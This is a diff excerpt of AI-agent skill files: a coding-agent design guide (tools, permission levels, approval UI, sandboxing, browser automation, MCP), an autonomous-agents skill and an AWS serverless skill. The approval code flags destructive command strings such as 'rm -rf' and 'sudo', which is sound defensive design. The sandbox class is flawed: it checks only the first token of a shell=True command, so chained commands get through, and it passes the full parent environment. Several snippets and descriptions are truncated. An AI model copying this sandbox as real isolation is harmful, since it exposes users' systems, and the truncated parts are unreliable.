def select_model(self, task_type: str) -> str:
|
||||
if task_type == "planning":
|
||||
return self.models["fast"]
|
||||
elif task_type == "analysis":
|
||||
return self.models["smart"]
|
||||
elif task_type == "code":
|
||||
return self.models["code"]
|
||||
return self.models["smart"]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 2. Tool Design Patterns
|
||||
|
||||
### 2.1 Tool Schema
|
||||
|
||||
```python
|
||||
class Tool:
|
||||
"""Base class for agent tools"""
|
||||
|
||||
@property
|
||||
def schema(self) -> dict:
|
||||
"""JSON Schema for the tool"""
|
||||
return {
|
||||
"name": self.name,
|
||||
"description": self.description,
|
||||
"parameters": {
|
||||
"type": "object",
|
||||
"properties": self._get_parameters(),
|
||||
"required": self._get_required()
|
||||
}
|
||||
}
|
||||
|
||||
def execute(self, **kwargs) -> ToolResult:
|
||||
"""Execute the tool and return result"""
|
||||
raise NotImplementedError
|
||||
|
||||
class ReadFileTool(Tool):
|
||||
name = "read_file"
|
||||
description = "Read the contents of a file from the filesystem"
|
||||
|
||||
def _get_parameters(self):
|
||||
return {
|
||||
"path": {
|
||||
"type": "string",
|
||||
"description": "Absolute path to the file"
|
||||
},
|
||||
"start_line": {
|
||||
"type": "integer",
|
||||
"description": "Line to start reading from (1-indexed)"
|
||||
},
|
||||
"end_line": {
|
||||
"type": "integer",
|
||||
"description": "Line to stop reading at (inclusive)"
|
||||
}
|
||||
}
|
||||
|
||||
def _get_required(self):
|
||||
return ["path"]
|
||||
|
||||
def execute(self, path: str, start_line: int = None, end_line: int = None) -> ToolResult:
|
||||
try:
|
||||
with open(path, 'r') as f:
|
||||
lines = f.readlines()
|
||||
|
||||
if start_line and end_line:
|
||||
lines = lines[start_line-1:end_line]
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
output="".join(lines)
|
||||
)
|
||||
except FileNotFoundError:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"File not found: {path}"
|
||||
)
|
||||
```
|
||||
|
||||
### 2.2 Essential Agent Tools
|
||||
|
||||
```python
|
||||
CODING_AGENT_TOOLS = {
|
||||
# File operations
|
||||
"read_file": "Read file contents",
|
||||
"write_file": "Create or overwrite a file",
|
||||
"edit_file": "Make targeted edits to a file",
|
||||
"list_directory": "List files and folders",
|
||||
"search_files": "Search for files by pattern",
|
||||
|
||||
# Code understanding
|
||||
"search_code": "Search for code patterns (grep)",
|
||||
"get_definition": "Find function/class definition",
|
||||
"get_references": "Find all references to a symbol",
|
||||
|
||||
# Terminal
|
||||
"run_command": "Execute a shell command",
|
||||
"read_output": "Read command output",
|
||||
"send_input": "Send input to running command",
|
||||
|
||||
# Browser (optional)
|
||||
"open_browser": "Open URL in browser",
|
||||
"click_element": "Click on page element",
|
||||
"type_text": "Type text into input",
|
||||
"screenshot": "Capture screenshot",
|
||||
|
||||
# Context
|
||||
"ask_user": "Ask the user a question",
|
||||
"search_web": "Search the web for information"
|
||||
}
|
||||
```
|
||||
|
||||
### 2.3 Edit Tool Design
|
||||
|
||||
```python
|
||||
class EditFileTool(Tool):
|
||||
"""
|
||||
Precise file editing with conflict detection.
|
||||
Uses search/replace pattern for reliable edits.
|
||||
"""
|
||||
|
||||
name = "edit_file"
|
||||
description = "Edit a file by replacing specific content"
|
||||
|
||||
def execute(
|
||||
self,
|
||||
path: str,
|
||||
search: str,
|
||||
replace: str,
|
||||
expected_occurrences: int = 1
|
||||
) -> ToolResult:
|
||||
"""
|
||||
Args:
|
||||
path: File to edit
|
||||
search: Exact text to find (must match exactly, including whitespace)
|
||||
replace: Text to replace with
|
||||
expected_occurrences: How many times search should appear (validation)
|
||||
"""
|
||||
with open(path, 'r') as f:
|
||||
content = f.read()
|
||||
|
||||
# Validate
|
||||
actual_occurrences = content.count(search)
|
||||
if actual_occurrences != expected_occurrences:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"Expected {expected_occurrences} occurrences, found {actual_occurrences}"
|
||||
)
|
||||
|
||||
if actual_occurrences == 0:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error="Search text not found in file"
|
||||
)
|
||||
|
||||
# Apply edit
|
||||
new_content = content.replace(search, replace)
|
||||
|
||||
with open(path, 'w') as f:
|
||||
f.write(new_content)
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
output=f"Replaced {actual_occurrences} occurrence(s)"
|
||||
)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. Permission & Safety Patterns
|
||||
|
||||
### 3.1 Permission Levels
|
||||
|
||||
```python
|
||||
class PermissionLevel(Enum):
|
||||
# Fully automatic - no user approval needed
|
||||
AUTO = "auto"
|
||||
|
||||
# Ask once per session
|
||||
ASK_ONCE = "ask_once"
|
||||
|
||||
# Ask every time
|
||||
ASK_EACH = "ask_each"
|
||||
|
||||
# Never allow
|
||||
NEVER = "never"
|
||||
|
||||
PERMISSION_CONFIG = {
|
||||
# Low risk - can auto-approve
|
||||
"read_file": PermissionLevel.AUTO,
|
||||
"list_directory": PermissionLevel.AUTO,
|
||||
"search_code": PermissionLevel.AUTO,
|
||||
|
||||
# Medium risk - ask once
|
||||
"write_file": PermissionLevel.ASK_ONCE,
|
||||
"edit_file": PermissionLevel.ASK_ONCE,
|
||||
|
||||
# High risk - ask each time
|
||||
"run_command": PermissionLevel.ASK_EACH,
|
||||
"delete_file": PermissionLevel.ASK_EACH,
|
||||
|
||||
# Dangerous - never auto-approve
|
||||
"sudo_command": PermissionLevel.NEVER,
|
||||
"format_disk": PermissionLevel.NEVER
|
||||
}
|
||||
```
|
||||
|
||||
### 3.2 Approval UI Pattern
|
||||
|
||||
```python
|
||||
class ApprovalManager:
|
||||
def __init__(self, ui, config):
|
||||
self.ui = ui
|
||||
self.config = config
|
||||
self.session_approvals = {}
|
||||
|
||||
def request_approval(self, tool_name: str, args: dict) -> bool:
|
||||
level = self.config.get(tool_name, PermissionLevel.ASK_EACH)
|
||||
|
||||
if level == PermissionLevel.AUTO:
|
||||
return True
|
||||
|
||||
if level == PermissionLevel.NEVER:
|
||||
self.ui.show_error(f"Tool '{tool_name}' is not allowed")
|
||||
return False
|
||||
|
||||
if level == PermissionLevel.ASK_ONCE:
|
||||
if tool_name in self.session_approvals:
|
||||
return self.session_approvals[tool_name]
|
||||
|
||||
# Show approval dialog
|
||||
approved = self.ui.show_approval_dialog(
|
||||
tool=tool_name,
|
||||
args=args,
|
||||
risk_level=self._assess_risk(tool_name, args)
|
||||
)
|
||||
|
||||
if level == PermissionLevel.ASK_ONCE:
|
||||
self.session_approvals[tool_name] = approved
|
||||
|
||||
return approved
|
||||
|
||||
def _assess_risk(self, tool_name: str, args: dict) -> str:
|
||||
"""Analyze specific call for risk level"""
|
||||
if tool_name == "run_command":
|
||||
cmd = args.get("command", "")
|
||||
if any(danger in cmd for danger in ["rm -rf", "sudo", "chmod"]):
|
||||
return "HIGH"
|
||||
return "MEDIUM"
|
||||
```
|
||||
|
||||
### 3.3 Sandboxing
|
||||
|
||||
```python
|
||||
class SandboxedExecution:
|
||||
"""
|
||||
Execute code/commands in isolated environment
|
||||
"""
|
||||
|
||||
def __init__(self, workspace_dir: str):
|
||||
self.workspace = workspace_dir
|
||||
self.allowed_commands = ["npm", "python", "node", "git", "ls", "cat"]
|
||||
self.blocked_paths = ["/etc", "/usr", "/bin", os.path.expanduser("~")]
|
||||
|
||||
def validate_path(self, path: str) -> bool:
|
||||
"""Ensure path is within workspace"""
|
||||
real_path = os.path.realpath(path)
|
||||
workspace_real = os.path.realpath(self.workspace)
|
||||
return real_path.startswith(workspace_real)
|
||||
|
||||
def validate_command(self, command: str) -> bool:
|
||||
"""Check if command is allowed"""
|
||||
cmd_parts = shlex.split(command)
|
||||
if not cmd_parts:
|
||||
return False
|
||||
|
||||
base_cmd = cmd_parts[0]
|
||||
return base_cmd in self.allowed_commands
|
||||
|
||||
def execute_sandboxed(self, command: str) -> ToolResult:
|
||||
if not self.validate_command(command):
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"Command not allowed: {command}"
|
||||
)
|
||||
|
||||
# Execute in isolated environment
|
||||
result = subprocess.run(
|
||||
command,
|
||||
shell=True,
|
||||
cwd=self.workspace,
|
||||
capture_output=True,
|
||||
timeout=30,
|
||||
env={
|
||||
**os.environ,
|
||||
"HOME": self.workspace, # Isolate home directory
|
||||
}
|
||||
)
|
||||
|
||||
return ToolResult(
|
||||
success=result.returncode == 0,
|
||||
output=result.stdout.decode(),
|
||||
error=result.stderr.decode() if result.returncode != 0 else None
|
||||
)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 4. Browser Automation
|
||||
|
||||
### 4.1 Browser Tool Pattern
|
||||
|
||||
```python
|
||||
class BrowserTool:
|
||||
"""
|
||||
Browser automation for agents using Playwright/Puppeteer.
|
||||
Enables visual debugging and web testing.
|
||||
"""
|
||||
|
||||
def __init__(self, headless: bool = True):
|
||||
self.browser = None
|
||||
self.page = None
|
||||
self.headless = headless
|
||||
|
||||
async def open_url(self, url: str) -> ToolResult:
|
||||
"""Navigate to URL and return page info"""
|
||||
if not self.browser:
|
||||
self.browser = await playwright.chromium.launch(headless=self.headless)
|
||||
self.page = await self.browser.new_page()
|
||||
|
||||
await self.page.goto(url)
|
||||
|
||||
# Capture state
|
||||
screenshot = await self.page.screenshot(type='png')
|
||||
title = await self.page.title()
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
output=f"Loaded: {title}",
|
||||
metadata={
|
||||
"screenshot": base64.b64encode(screenshot).decode(),
|
||||
"url": self.page.url
|
||||
}
|
||||
)
|
||||
|
||||
async def click(self, selector: str) -> ToolResult:
|
||||
"""Click on an element"""
|
||||
try:
|
||||
await self.page.click(selector, timeout=5000)
|
||||
await self.page.wait_for_load_state("networkidle")
|
||||
|
||||
screenshot = await self.page.screenshot()
|
||||
return ToolResult(
|
||||
success=True,
|
||||
output=f"Clicked: {selector}",
|
||||
metadata={"screenshot": base64.b64encode(screenshot).decode()}
|
||||
)
|
||||
except TimeoutError:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"Element not found: {selector}"
|
||||
)
|
||||
|
||||
async def type_text(self, selector: str, text: str) -> ToolResult:
|
||||
"""Type text into an input"""
|
||||
await self.page.fill(selector, text)
|
||||
return ToolResult(success=True, output=f"Typed into {selector}")
|
||||
|
||||
async def get_page_content(self) -> ToolResult:
|
||||
"""Get accessible text content of the page"""
|
||||
content = await self.page.evaluate("""
|
||||
() => {
|
||||
// Get visible text
|
||||
const walker = document.createTreeWalker(
|
||||
document.body,
|
||||
NodeFilter.SHOW_TEXT,
|
||||
null,
|
||||
false
|
||||
);
|
||||
|
||||
let text = '';
|
||||
while (walker.nextNode()) {
|
||||
const node = walker.currentNode;
|
||||
if (node.textContent.trim()) {
|
||||
text += node.textContent.trim() + '\\n';
|
||||
}
|
||||
}
|
||||
return text;
|
||||
}
|
||||
""")
|
||||
return ToolResult(success=True, output=content)
|
||||
```
|
||||
|
||||
### 4.2 Visual Agent Pattern
|
||||
|
||||
```python
|
||||
class VisualAgent:
|
||||
"""
|
||||
Agent that uses screenshots to understand web pages.
|
||||
Can identify elements visually without selectors.
|
||||
"""
|
||||
|
||||
def __init__(self, llm, browser):
|
||||
self.llm = llm
|
||||
self.browser = browser
|
||||
|
||||
async def describe_page(self) -> str:
|
||||
"""Use vision model to describe current page"""
|
||||
screenshot = await self.browser.screenshot()
|
||||
|
||||
response = self.llm.chat([
|
||||
{
|
||||
"role": "user",
|
||||
"content": [
|
||||
{"type": "text", "text": "Describe this webpage. List all interactive elements you see."},
|
||||
{"type": "image", "data": screenshot}
|
||||
]
|
||||
}
|
||||
])
|
||||
|
||||
return response.content
|
||||
|
||||
async def find_and_click(self, description: str) -> ToolResult:
|
||||
"""Find element by visual description and click it"""
|
||||
screenshot = await self.browser.screenshot()
|
||||
|
||||
# Ask vision model to find element
|
||||
response = self.llm.chat([
|
||||
{
|
||||
"role": "user",
|
||||
"content": [
|
||||
{
|
||||
"type": "text",
|
||||
"text": f"""
|
||||
Find the element matching: "{description}"
|
||||
Return the approximate coordinates as JSON: {{"x": number, "y": number}}
|
||||
"""
|
||||
},
|
||||
{"type": "image", "data": screenshot}
|
||||
]
|
||||
}
|
||||
])
|
||||
|
||||
coords = json.loads(response.content)
|
||||
await self.browser.page.mouse.click(coords["x"], coords["y"])
|
||||
|
||||
return ToolResult(success=True, output=f"Clicked at ({coords['x']}, {coords['y']})")
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 5. Context Management
|
||||
|
||||
### 5.1 Context Injection Patterns
|
||||
|
||||
````python
|
||||
class ContextManager:
|
||||
"""
|
||||
Manage context provided to the agent.
|
||||
Inspired by Cline's @-mention patterns.
|
||||
"""
|
||||
|
||||
def __init__(self, workspace: str):
|
||||
self.workspace = workspace
|
||||
self.context = []
|
||||
|
||||
def add_file(self, path: str) -> None:
|
||||
"""@file - Add file contents to context"""
|
||||
with open(path, 'r') as f:
|
||||
content = f.read()
|
||||
|
||||
self.context.append({
|
||||
"type": "file",
|
||||
"path": path,
|
||||
"content": content
|
||||
})
|
||||
|
||||
def add_folder(self, path: str, max_files: int = 20) -> None:
|
||||
"""@folder - Add all files in folder"""
|
||||
for root, dirs, files in os.walk(path):
|
||||
for file in files[:max_files]:
|
||||
file_path = os.path.join(root, file)
|
||||
self.add_file(file_path)
|
||||
|
||||
def add_url(self, url: str) -> None:
|
||||
"""@url - Fetch and add URL content"""
|
||||
response = requests.get(url)
|
||||
content = html_to_markdown(response.text)
|
||||
|
||||
self.context.append({
|
||||
"type": "url",
|
||||
"url": url,
|
||||
"content": content
|
||||
})
|
||||
|
||||
def add_problems(self, diagnostics: list) -> None:
|
||||
"""@problems - Add IDE diagnostics"""
|
||||
self.context.append({
|
||||
"type": "diagnostics",
|
||||
"problems": diagnostics
|
||||
})
|
||||
|
||||
def format_for_prompt(self) -> str:
|
||||
"""Format all context for LLM prompt"""
|
||||
parts = []
|
||||
for item in self.context:
|
||||
if item["type"] == "file":
|
||||
parts.append(f"## File: {item['path']}\n```\n{item['content']}\n```")
|
||||
elif item["type"] == "url":
|
||||
parts.append(f"## URL: {item['url']}\n{item['content']}")
|
||||
elif item["type"] == "diagnostics":
|
||||
parts.append(f"## Problems:\n{json.dumps(item['problems'], indent=2)}")
|
||||
|
||||
return "\n\n".join(parts)
|
||||
````
|
||||
|
||||
### 5.2 Checkpoint/Resume
|
||||
|
||||
```python
|
||||
class CheckpointManager:
|
||||
"""
|
||||
Save and restore agent state for long-running tasks.
|
||||
"""
|
||||
|
||||
def __init__(self, storage_dir: str):
|
||||
self.storage_dir = storage_dir
|
||||
os.makedirs(storage_dir, exist_ok=True)
|
||||
|
||||
def save_checkpoint(self, session_id: str, state: dict) -> str:
|
||||
"""Save current agent state"""
|
||||
checkpoint = {
|
||||
"timestamp": datetime.now().isoformat(),
|
||||
"session_id": session_id,
|
||||
"history": state["history"],
|
||||
"context": state["context"],
|
||||
"workspace_state": self._capture_workspace(state["workspace"]),
|
||||
"metadata": state.get("metadata", {})
|
||||
}
|
||||
|
||||
path = os.path.join(self.storage_dir, f"{session_id}.json")
|
||||
with open(path, 'w') as f:
|
||||
json.dump(checkpoint, f, indent=2)
|
||||
|
||||
return path
|
||||
|
||||
def restore_checkpoint(self, checkpoint_path: str) -> dict:
|
||||
"""Restore agent state from checkpoint"""
|
||||
with open(checkpoint_path, 'r') as f:
|
||||
checkpoint = json.load(f)
|
||||
|
||||
return {
|
||||
"history": checkpoint["history"],
|
||||
"context": checkpoint["context"],
|
||||
"workspace": self._restore_workspace(checkpoint["workspace_state"]),
|
||||
"metadata": checkpoint["metadata"]
|
||||
}
|
||||
|
||||
def _capture_workspace(self, workspace: str) -> dict:
|
||||
"""Capture relevant workspace state"""
|
||||
# Git status, file hashes, etc.
|
||||
return {
|
||||
"git_ref": subprocess.getoutput(f"cd {workspace} && git rev-parse HEAD"),
|
||||
"git_dirty": subprocess.getoutput(f"cd {workspace} && git status --porcelain")
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 6. MCP (Model Context Protocol) Integration
|
||||
|
||||
### 6.1 MCP Server Pattern
|
||||
|
||||
```python
|
||||
from mcp import Server, Tool
|
||||
|
||||
class MCPAgent:
|
||||
"""
|
||||
Agent that can dynamically discover and use MCP tools.
|
||||
'Add a tool that...' pattern from Cline.
|
||||
"""
|
||||
|
||||
def __init__(self, llm):
|
||||
self.llm = llm
|
||||
self.mcp_servers = {}
|
||||
self.available_tools = {}
|
||||
|
||||
def connect_server(self, name: str, config: dict) -> None:
|
||||
"""Connect to an MCP server"""
|
||||
server = Server(config)
|
||||
self.mcp_servers[name] = server
|
||||
|
||||
# Discover tools
|
||||
tools = server.list_tools()
|
||||
for tool in tools:
|
||||
self.available_tools[tool.name] = {
|
||||
"server": name,
|
||||
"schema": tool.schema
|
||||
}
|
||||
|
||||
async def create_tool(self, description: str) -> str:
|
||||
"""
|
||||
Create a new MCP server based on user description.
|
||||
'Add a tool that fetches Jira tickets'
|
||||
"""
|
||||
# Generate MCP server code
|
||||
code = self.llm.generate(f"""
|
||||
Create a Python MCP server with a tool that does:
|
||||
{description}
|
||||
|
||||
Use the FastMCP framework. Include proper error handling.
|
||||
Return only the Python code.
|
||||
""")
|
||||
|
||||
# Save and install
|
||||
server_name = self._extract_name(description)
|
||||
path = f"./mcp_servers/{server_name}/server.py"
|
||||
|
||||
with open(path, 'w') as f:
|
||||
f.write(code)
|
||||
|
||||
# Hot-reload
|
||||
self.connect_server(server_name, {"path": path})
|
||||
|
||||
return f"Created tool: {server_name}"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Best Practices Checklist
|
||||
|
||||
### Agent Design
|
||||
|
||||
- [ ] Clear task decomposition
|
||||
- [ ] Appropriate tool granularity
|
||||
- [ ] Error handling at each step
|
||||
- [ ] Progress visibility to user
|
||||
|
||||
### Safety
|
||||
|
||||
- [ ] Permission system implemented
|
||||
- [ ] Dangerous operations blocked
|
||||
- [ ] Sandbox for untrusted code
|
||||
- [ ] Audit logging enabled
|
||||
|
||||
### UX
|
||||
|
||||
- [ ] Approval UI is clear
|
||||
- [ ] Progress updates provided
|
||||
- [ ] Undo/rollback available
|
||||
- [ ] Explanation of actions
|
||||
|
||||
---
|
||||
|
||||
## Resources
|
||||
|
||||
- [Cline](https://github.com/cline/cline)
|
||||
- [OpenAI Codex](https://github.com/openai/codex)
|
||||
- [Model Context Protocol](https://modelcontextprotocol.io/)
|
||||
- [Anthropic Tool Use](https://docs.anthropic.com/claude/docs/tool-use)
|
||||
68
skills/autonomous-agents/SKILL.md
Normal file
68
skills/autonomous-agents/SKILL.md
Normal file
@@ -0,0 +1,68 @@
|
||||
---
|
||||
name: autonomous-agents
|
||||
description: "Autonomous agents are AI systems that can independently decompose goals, plan actions, execute tools, and self-correct without constant human guidance. The challenge isn't making them capable - it's making them reliable. Every extra decision multiplies failure probability. This skill covers agent loops (ReAct, Plan-Execute), goal decomposition, reflection patterns, and production reliability. Key insight: compounding error rates kill autonomous agents. A 95% success rate per step drops to 60% b"
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Autonomous Agents
|
||||
|
||||
You are an agent architect who has learned the hard lessons of autonomous AI.
|
||||
You've seen the gap between impressive demos and production disasters. You know
|
||||
that a 95% success rate per step means only 60% by step 10.
|
||||
|
||||
Your core insight: Autonomy is earned, not granted. Start with heavily
|
||||
constrained agents that do one thing reliably. Add autonomy only as you prove
|
||||
reliability. The best agents look less impressive but work consistently.
|
||||
|
||||
You push for guardrails before capabilities, logging befor
|
||||
|
||||
## Capabilities
|
||||
|
||||
- autonomous-agents
|
||||
- agent-loops
|
||||
- goal-decomposition
|
||||
- self-correction
|
||||
- reflection-patterns
|
||||
- react-pattern
|
||||
- plan-execute
|
||||
- agent-reliability
|
||||
- agent-guardrails
|
||||
|
||||
## Patterns
|
||||
|
||||
### ReAct Agent Loop
|
||||
|
||||
Alternating reasoning and action steps
|
||||
|
||||
### Plan-Execute Pattern
|
||||
|
||||
Separate planning phase from execution
|
||||
|
||||
### Reflection Pattern
|
||||
|
||||
Self-evaluation and iterative improvement
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Unbounded Autonomy
|
||||
|
||||
### ❌ Trusting Agent Outputs
|
||||
|
||||
### ❌ General-Purpose Autonomy
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | critical | ## Reduce step count |
|
||||
| Issue | critical | ## Set hard cost limits |
|
||||
| Issue | critical | ## Test at scale before production |
|
||||
| Issue | high | ## Validate against ground truth |
|
||||
| Issue | high | ## Build robust API clients |
|
||||
| Issue | high | ## Least privilege principle |
|
||||
| Issue | medium | ## Track context usage |
|
||||
| Issue | medium | ## Structured logging |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `agent-tool-builder`, `agent-memory-systems`, `multi-agent-orchestration`, `agent-evaluation`
|
||||
323
skills/aws-serverless/SKILL.md
Normal file
323
skills/aws-serverless/SKILL.md
Normal file
@@ -0,0 +1,323 @@
|
||||
---
|
||||
name: aws-serverless
|
||||
description: "Specialized skill for building production-ready serverless applications on AWS. Covers Lambda functions, API Gateway, DynamoDB, SQS/SNS event-driven patterns, SAM/CDK deployment, and cold start optimization."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# AWS Serverless
|
||||
|
||||
## Patterns
|
||||
|
||||
### Lambda Handler Pattern
|
||||
|
||||
Proper Lambda function structure with error handling
|
||||
|
||||
**When to use**: ['Any Lambda function implementation', 'API handlers, event processors, scheduled tasks']
|
||||
|
||||
```python
|
||||
```javascript
|
||||
// Node.js Lambda Handler
|
||||
// handler.js
|
||||
|
||||
// Initialize outside handler (reused across invocations)
|
||||
const { DynamoDBClient } = require('@aws-sdk/client-dynamodb');
|
||||
const { DynamoDBDocumentClient, GetCommand } = require('@aws-sdk/lib-dynamodb');
|
||||
|
||||
const client = new DynamoDBClient({});
|
||||
const docClient = DynamoDBDocumentClient.from(client);
|
||||
|
||||
// Handler function
|
||||
exports.handler = async (event, context) => {
|
||||
// Optional: Don't wait for event loop to clear (Node.js)
|
||||
context.callbackWaitsForEmptyEventLoop = false;
|
||||
|
||||
try {
|
||||
// Parse input based on event source
|
||||
const body = typeof event.body === 'string'
|
||||
? JSON.parse(event.body)
|
||||
: event.body;
|
||||
|
||||
// Business logic
|
||||
const result = await processRequest(body);
|
||||
|
||||
// Return API Gateway compatible response
|
||||
return {
|
||||
statusCode: 200,
|
||||
headers: {
|
||||
'Content-Type': 'application/json',
|
||||
'Access-Control-Allow-Origin': '*'
|
||||
},
|
||||
body: JSON.stringify(result)
|
||||
};
|
||||
} catch (error) {
|
||||
console.error('Error:', JSON.stringify({
|
||||
error: error.message,
|
||||
stack: error.stack,
|
||||
requestId: context.awsRequestId
|
||||
}));
|
||||
|
||||
return {
|
||||
statusCode: error.statusCode || 500,
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
error: error.message || 'Internal server error'
|
||||
})
|
||||
};
|
||||
}
|
||||
};
|
||||
|
||||
async function processRequest(data) {
|
||||
// Your business logic here
|
||||
const result = await docClient.send(new GetCommand({
|
||||
TableName: process.env.TABLE_NAME,
|
||||
Key: { id: data.id }
|
||||
}));
|
||||
return result.Item;
|
||||
}
|
||||
```
|
||||
|
||||
```python
|
||||
# Python Lambda Handler
|
||||
# handler.py
|
||||
|
||||
import json
|
||||
import os
|
||||
import logging
|
||||
import boto3
|
||||
from botocore.exceptions import ClientError
|
||||
|
||||
# Initialize outside handler (reused across invocations)
|
||||
logger = logging.getLogger()
|
||||
logger.setLevel(logging.INFO)
|
||||
|
||||
dynamodb = boto3.resource('dynamodb')
|
||||
table = dynamodb.Table(os.environ['TABLE_NAME'])
|
||||
|
||||
def handler(event, context):
|
||||
try:
|
||||
# Parse i
|
||||
```
|
||||
|
||||
### API Gateway Integration Pattern
|
||||
|
||||
REST API and HTTP API integration with Lambda
|
||||
|
||||
**When to use**: ['Building REST APIs backed by Lambda', 'Need HTTP endpoints for functions']
|
||||
|
||||
```javascript
|
||||
```yaml
|
||||
# template.yaml (SAM)
|
||||
AWSTemplateFormatVersion: '2010-09-09'
|
||||
Transform: AWS::Serverless-2016-10-31
|
||||
|
||||
Globals:
|
||||
Function:
|
||||
Runtime: nodejs20.x
|
||||
Timeout: 30
|
||||
MemorySize: 256
|
||||
Environment:
|
||||
Variables:
|
||||
TABLE_NAME: !Ref ItemsTable
|
||||
|
||||
Resources:
|
||||
# HTTP API (recommended for simple use cases)
|
||||
HttpApi:
|
||||
Type: AWS::Serverless::HttpApi
|
||||
Properties:
|
||||
StageName: prod
|
||||
CorsConfiguration:
|
||||
AllowOrigins:
|
||||
- "*"
|
||||
AllowMethods:
|
||||
- GET
|
||||
- POST
|
||||
- DELETE
|
||||
AllowHeaders:
|
||||
- "*"
|
||||
|
||||
# Lambda Functions
|
||||
GetItemFunction:
|
||||
Type: AWS::Serverless::Function
|
||||
Properties:
|
||||
Handler: src/handlers/get.handler
|
||||
Events:
|
||||
GetItem:
|
||||
Type: HttpApi
|
||||
Properties:
|
||||
ApiId: !Ref HttpApi
|
||||
Path: /items/{id}
|
||||
Method: GET
|
||||
Policies:
|
||||
- DynamoDBReadPolicy:
|
||||
TableName: !Ref ItemsTable
|
||||
|
||||
CreateItemFunction:
|
||||
Type: AWS::Serverless::Function
|
||||
Properties:
|
||||
Handler: src/handlers/create.handler
|
||||
Events:
|
||||
CreateItem:
|
||||
Type: HttpApi
|
||||
Properties:
|
||||
ApiId: !Ref HttpApi
|
||||
Path: /items
|
||||
Method: POST
|
||||
Policies:
|
||||
- DynamoDBCrudPolicy:
|
||||
TableName: !Ref ItemsTable
|
||||
|
||||
# DynamoDB Table
|
||||
ItemsTable:
|
||||
Type: AWS::DynamoDB::Table
|
||||
Properties:
|
||||
AttributeDefinitions:
|
||||
- AttributeName: id
|
||||
AttributeType: S
|
||||
KeySchema:
|
||||
- AttributeName: id
|
||||
KeyType: HASH
|
||||
BillingMode: PAY_PER_REQUEST
|
||||
|
||||
Outputs:
|
||||
ApiUrl:
|
||||
Value: !Sub "https://${HttpApi}.execute-api.${AWS::Region}.amazonaws.com/prod"
|
||||
```
|
||||
|
||||
```javascript
|
||||
// src/handlers/get.js
|
||||
const { getItem } = require('../lib/dynamodb');
|
||||
|
||||
exports.handler = async (event) => {
|
||||
const id = event.pathParameters?.id;
|
||||
|
||||
if (!id) {
|
||||
return {
|
||||
statusCode: 400,
|
||||
body: JSON.stringify({ error: 'Missing id parameter' })
|
||||
};
|
||||
}
|
||||
|
||||
const item =
|
||||
```
|
||||
|
||||
### Event-Driven SQS Pattern
|
||||
|
||||
Lambda triggered by SQS for reliable async processing
|
||||
|
||||
**When to use**: ['Decoupled, asynchronous processing', 'Need retry logic and DLQ', 'Processing messages in batches']
|
||||
|
||||
```python
|
||||
```yaml
|
||||
# template.yaml
|
||||
Resources:
|
||||
ProcessorFunction:
|
||||
Type: AWS::Serverless::Function
|
||||
Properties:
|
||||
Handler: src/handlers/processor.handler
|
||||
Events:
|
||||
SQSEvent:
|
||||
Type: SQS
|
||||
Properties:
|
||||
Queue: !GetAtt ProcessingQueue.Arn
|
||||
BatchSize: 10
|
||||
FunctionResponseTypes:
|
||||
- ReportBatchItemFailures # Partial batch failure handling
|
||||
|
||||
ProcessingQueue:
|
||||
Type: AWS::SQS::Queue
|
||||
Properties:
|
||||
VisibilityTimeout: 180 # 6x Lambda timeout
|
||||
RedrivePolicy:
|
||||
deadLetterTargetArn: !GetAtt DeadLetterQueue.Arn
|
||||
maxReceiveCount: 3
|
||||
|
||||
DeadLetterQueue:
|
||||
Type: AWS::SQS::Queue
|
||||
Properties:
|
||||
MessageRetentionPeriod: 1209600 # 14 days
|
||||
```
|
||||
|
||||
```javascript
|
||||
// src/handlers/processor.js
|
||||
exports.handler = async (event) => {
|
||||
const batchItemFailures = [];
|
||||
|
||||
for (const record of event.Records) {
|
||||
try {
|
||||
const body = JSON.parse(record.body);
|
||||
await processMessage(body);
|
||||
} catch (error) {
|
||||
console.error(`Failed to process message ${record.messageId}:`, error);
|
||||
// Report this item as failed (will be retried)
|
||||
batchItemFailures.push({
|
||||
itemIdentifier: record.messageId
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
// Return failed items for retry
|
||||
return { batchItemFailures };
|
||||
};
|
||||
|
||||
async function processMessage(message) {
|
||||
// Your processing logic
|
||||
console.log('Processing:', message);
|
||||
|
||||
// Simulate work
|
||||
await saveToDatabase(message);
|
||||
}
|
||||
```
|
||||
|
||||
```python
|
||||
# Python version
|
||||
import json
|
||||
import logging
|
||||
|
||||
logger = logging.getLogger()
|
||||
|
||||
def handler(event, context):
|
||||
batch_item_failures = []
|
||||
|
||||
for record in event['Records']:
|
||||
try:
|
||||
body = json.loads(record['body'])
|
||||
process_message(body)
|
||||
except Exception as e:
|
||||
logger.error(f"Failed to process {record['messageId']}: {e}")
|
||||
batch_item_failures.append({
|
||||
'itemIdentifier': record['messageId']
|
||||
})
|
||||
|
||||
return {'batchItemFailures': batch_ite
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Monolithic Lambda
|
||||
|
||||
**Why bad**: Large deployment packages cause slow cold starts.
|
||||
Hard to scale individual operations.
|
||||
Updates affect entire system.
|
||||
|
||||
### ❌ Large Dependencies
|
||||
|
||||
**Why bad**: Increases deployment package size.
|
||||
Slows down cold starts significantly.
|
||||
Most of SDK/library may be unused.
|
||||
|
||||
